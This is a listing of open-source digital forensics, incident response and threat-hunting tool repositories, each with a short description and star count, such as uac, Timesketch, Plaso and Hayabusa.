uacUAC is a Live Response collection script for Incident Response that makes use of native binaries and tools to automate the collection of AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris systems artifacts.
Stars: ✭ 260 (+293.94%)
Mac aptmacOS Artifact Parsing Tool
Stars: ✭ 329 (+398.48%)
UserlineQuery and report user logons relations from MS Windows Security Events
Stars: ✭ 221 (+234.85%)
LinuxforensicsEverything related to Linux Forensics
Stars: ✭ 189 (+186.36%)
RecuperabitA tool for forensic file system reconstruction.
Stars: ✭ 280 (+324.24%)
Ir RescueA Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response.
Stars: ✭ 311 (+371.21%)
TimesketchCollaborative forensic timeline analysis
Stars: ✭ 1,795 (+2619.7%)
dnslogMinimalistic DNS logging tool
Stars: ✭ 40 (-39.39%)
ad-privileged-auditProvides various Windows Server Active Directory (AD) security-focused reports.
Stars: ✭ 42 (-36.36%)
Swap digger swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web forms credentials, web forms emails, http basic authentication, Wifi SSID and keys, etc.
Stars: ✭ 354 (+436.36%)
GetConsoleHistoryAndOutputAn Incident Response tool to extract console command history and screen output buffer
Stars: ✭ 41 (-37.88%)
RdpCacheStitcherRdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps.
Stars: ✭ 176 (+166.67%)
EventTranscriptParserPython based tool to extract forensic info from EventTranscript.db (Windows Diagnostic Data)
Stars: ✭ 22 (-66.67%)
ir scriptsincident response scripts
Stars: ✭ 17 (-74.24%)
PypowershellxrayPython script to decode common encoded PowerShell scripts
Stars: ✭ 192 (+190.91%)
AdtimelineTimeline of Active Directory changes with replication metadata
Stars: ✭ 252 (+281.82%)
hayabusaHayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Stars: ✭ 908 (+1275.76%)
INDXRipperCarve file metadata from NTFS index ($I30) attributes
Stars: ✭ 32 (-51.52%)
MemlabsEducational, CTF-styled labs for individuals interested in Memory Forensics
Stars: ✭ 696 (+954.55%)
MindMaps#ThreatHunting #DFIR #Malware #Detection Mind Maps
Stars: ✭ 224 (+239.39%)
smram parseSystem Management RAM analysis tool
Stars: ✭ 50 (-24.24%)
LevelDBDumperDumps all of the Key/Value pairs from a LevelDB database
Stars: ✭ 23 (-65.15%)
PSTraceTrace ScriptBlock execution for powershell v2
Stars: ✭ 38 (-42.42%)
HindsightWeb browser forensics for Google Chrome/Chromium
Stars: ✭ 589 (+792.42%)
PackratLive system forensic collector
Stars: ✭ 16 (-75.76%)
TurbiniaAutomation and Scaling of Digital Forensics Tools
Stars: ✭ 461 (+598.48%)
WELAWELA (Windows Event Log Analyzer): The Swiss Army knife for Windows Event Logs! ゑ羅(ウェラ)
Stars: ✭ 442 (+569.7%)
MEATThis toolkit aims to help forensicators perform different kinds of acquisitions on iOS devices
Stars: ✭ 101 (+53.03%)
CDIRCDIR (Cyber Defense Institute Incident Response) Collector - live collection tool based on oss tool/library
Stars: ✭ 122 (+84.85%)
CCXDiggerThe CyberCX Digger project is designed to help Australian organisations determine if they have been impacted by certain high profile cyber security incidents. Digger provides threat hunting functionality packaged in a simple-to-use tool, allowing users to detect certain attacker activities; all for free.
Stars: ✭ 45 (-31.82%)
DFIR-O365RCPowerShell module for Office 365 and Azure log collection
Stars: ✭ 158 (+139.39%)
AutotimelinerAutomagically extract forensic timeline from volatile memory dump
Stars: ✭ 54 (-18.18%)
DiffyDiffy is a triage tool used during cloud-centric security incidents, to help digital forensics and incident response (DFIR) teams quickly identify suspicious hosts on which to focus their response.
Stars: ✭ 555 (+740.91%)
Operative Frameworkoperative framework is a OSINT investigation framework, you can interact with multiple targets, execute multiple modules, create links with target, export rapport to PDF file, add note to target or results, interact with RESTFul API, write your own modules.
Stars: ✭ 511 (+674.24%)
BeagleBeagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
Stars: ✭ 976 (+1378.79%)
SeqboxA single file container/archive that can be reconstructed even after total loss of file system structures
Stars: ✭ 480 (+627.27%)
PlasoSuper timeline all the things
Stars: ✭ 1,055 (+1498.48%)
Forensic ToolsCIRCL system forensic tools or a jumble of tools to support forensic
Stars: ✭ 27 (-59.09%)
Awesome ForensicsAwesome Forensics Resources. Almost 300 open source forensics tools, and 600 blog posts about forensics.
Stars: ✭ 446 (+575.76%)
ThreatingestorExtract and aggregate threat intelligence.
Stars: ✭ 439 (+565.15%)
PcapfsA FUSE module to mount captured network data
Stars: ✭ 17 (-74.24%)
GosintOSINT Swiss Army Knife
Stars: ✭ 401 (+507.58%)
MimirSmart OSINT collection of common IOC types
Stars: ✭ 63 (-4.55%)
ScriptingPS / Bash / Python / Other scripts For FUN!
Stars: ✭ 47 (-28.79%)
Artifacts📇 Digital Forensics Artifact Repository (forensicanalysis edition)
Stars: ✭ 21 (-68.18%)
PigA Linux packet crafting tool.
Stars: ✭ 384 (+481.82%)
ZeekZeek is a powerful network analysis framework that is much different from the typical IDS you may know.
Stars: ✭ 4,180 (+6233.33%)
Tr1pdtamper resistant audit log
Stars: ✭ 13 (-80.3%)
LookylooLookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other.
Stars: ✭ 381 (+477.27%)
Infosec referenceAn Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for non-MS Git hosted version.
Stars: ✭ 4,162 (+6206.06%)
YetiYour Everyday Threat Intelligence
Stars: ✭ 1,037 (+1471.21%)
GensumPowerful checksum generator!
Stars: ✭ 12 (-81.82%)
SiftSIFT
Stars: ✭ 355 (+437.88%)
KauditAlcide Kubernetes Audit Log Analyzer - Alcide kAudit
Stars: ✭ 23 (-65.15%)
ThehivedocsDocumentation of TheHive
Stars: ✭ 353 (+434.85%)
MetaforgeAn OSINT Metadata analyzing tool that filters through tags and creates reports
Stars: ✭ 63 (-4.55%)